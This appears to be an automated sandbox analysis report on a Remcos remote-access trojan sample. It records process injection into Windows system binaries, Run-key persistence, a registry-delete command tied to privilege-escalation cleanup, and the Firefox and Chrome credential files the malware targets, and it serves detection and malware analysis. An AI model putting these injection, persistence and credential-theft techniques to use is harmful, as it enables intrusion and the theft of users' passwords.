              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 24_3_03CB9845 push ecx; ret 24_3_03CB9848
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 24_3_03CBB002 push cs; ret 24_3_03CBB005
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_007210A8 push eax; ret 28_2_007210C6
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_00728445 push esi; ret 28_2_0072844E
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_00720786 push ecx; ret 28_2_00720799
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006FFBA6 push ecx; ret 28_2_006FFBB9
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0040CD09
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeFile created: C:\Users\Public\Libraries\Srakjle\Srakjle.exeJump to dropped file
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D5C8B ShellExecuteW,URLDownloadToFileW,28_2_006D5C8B
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_004163AD
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SrakjleJump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SrakjleJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0040CD09
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Delayed program exit foundShow sources
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0040D0B5 Sleep,ExitProcess,12_2_0040D0B5
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006DD0B5 Sleep,ExitProcess,28_2_006DD0B5
              Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 6972Thread sleep count: 46 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 6972Thread sleep time: -46000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004160DB
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,28_2_006E60DB
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040A012
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_004061C3 FindFirstFileW,FindNextFileW,12_2_004061C3
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040A22D
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_004153F5
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006DA012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_006DA012
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D61C3 FindFirstFileW,FindNextFileW,28_2_006D61C3
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006DA22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_006DA22D
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006E53F5 FindFirstFileW,FindNextFileW,FindNextFileW,28_2_006E53F5
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006E7754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,28_2_006E7754
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D77EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_006D77EC
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_00716AF9 FindFirstFileExA,28_2_00716AF9
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D7C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_006D7C55
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,28_2_006D697D
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006FF727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_006FF727
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0040CD09
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0040F15D GetProcessHeap,OpenProcess,OpenProcess,OpenProcess,GetCurrentProcessId,OpenProcess,GetCurrentProcessId,OpenProcess,12_2_0040F15D
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_0070CB4E mov eax, dword ptr fs:[00000030h]28_2_0070CB4E
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_1059111E mov eax, dword ptr fs:[00000030h]28_2_1059111E
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_1059111E mov eax, dword ptr fs:[00000030h]28_2_1059111E
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B80B99 LdrInitializeThunk,23_3_03B80B99
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0042F8B9 SetUnhandledExceptionFilter,12_2_0042F8B9
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006FF8B9 SetUnhandledExceptionFilter,28_2_006FF8B9
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006FF727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_006FF727
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_00706793 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00706793
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006FFD2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_006FFD2C

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2DF0000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3080000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3090000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30A0000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30B0000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3000000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3010000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3020000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3030000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3040000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3050000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 600000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 690000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 6A0000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 6B0000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 6C0000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 610000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 620000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 630000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 640000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 650000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 660000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 650000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 6E0000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 6F0000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 700000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 710000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 660000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 670000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 680000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 690000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 6A0000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 6B0000Jump to behavior
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000 value starts with: 4D5AJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000 value starts with: 4D5AJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000 value starts with: 4D5AJump to behavior
              Contains functionality to inject code into remote processesShow sources
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0041412B CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,12_2_0041412B
              Creates a thread in another existing process (thread injection)Show sources
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 2DF0000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 30B0000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3030000Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3050000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 600000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 6C0000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 640000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 660000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 650000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 710000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 690000Jump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 6B0000Jump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe28_2_006DFAC7
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.batJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /fJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exeJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exeJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006E4F84 StrToIntA,mouse_event,28_2_006E4F84
              Source: DpiScaling.exe, 0000000C.00000000.302254923.0000000003800000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.392437271.0000000003180000.00000002.00020000.sdmp, mobsync.exe, 00000020.00000000.429496517.0000000003180000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
              Source: DpiScaling.exe, 0000000C.00000000.302254923.0000000003800000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.392437271.0000000003180000.00000002.00020000.sdmp, mobsync.exe, 00000020.00000000.429496517.0000000003180000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: DpiScaling.exe, 0000000C.00000000.302254923.0000000003800000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.392437271.0000000003180000.00000002.00020000.sdmp, mobsync.exe, 00000020.00000000.429496517.0000000003180000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: DpiScaling.exe, 0000000C.00000000.302254923.0000000003800000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.392437271.0000000003180000.00000002.00020000.sdmp, mobsync.exe, 00000020.00000000.429496517.0000000003180000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: EnumSystemLocalesW,12_2_0044A1D0
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: GetLocaleInfoA,12_2_0040D1E5
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: EnumSystemLocalesW,12_2_0044A21B
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: EnumSystemLocalesW,12_2_0044A2B6
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_0044A343
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: GetLocaleInfoW,12_2_004423BA
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoA,28_2_006DD1E5
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: EnumSystemLocalesW,28_2_0071A1D0
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: EnumSystemLocalesW,28_2_0071A21B
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: EnumSystemLocalesW,28_2_0071A2B6
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,28_2_0071A343
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,28_2_007123BA
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,28_2_0071A593
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_0071A6BC
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,28_2_0071A7C3
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,28_2_0071A890
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: EnumSystemLocalesW,28_2_00711ED1
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,28_2_00719F58
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006FF9B4 cpuid 28_2_006FF9B4
              Source: C:\Windows\SysWOW64\DpiScaling.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_00442424 GetSystemTimeAsFileTime,12_2_00442424
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_00712C8E _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,28_2_00712C8E
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_00416D9E GetComputerNameExW,GetUserNameW,12_2_00416D9E

              Stealing of Sensitive Information:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 32.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.6d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10591a73.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.720000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.720000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.523698969.0000000003367000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.435807202.00000000008C8000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.409833618.0000000000818000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 6728, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4868, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 6120, type: MEMORYSTR
              Contains functionality to steal Firefox passwords or cookiesShow sources
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040A012
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: \key3.db12_2_0040A012
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\28_2_006DA012
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \key3.db28_2_006DA012
              Contains functionality to steal Chrome passwords or cookiesShow sources
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data28_2_006D9EF4

              Remote Access Functionality:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 32.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.6d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10591a73.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.720000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.720000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.523698969.0000000003367000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.435807202.00000000008C8000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.409833618.0000000000818000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 6728, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4868, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 6120, type: MEMORYSTR
              Detected Remcos RATShow sources
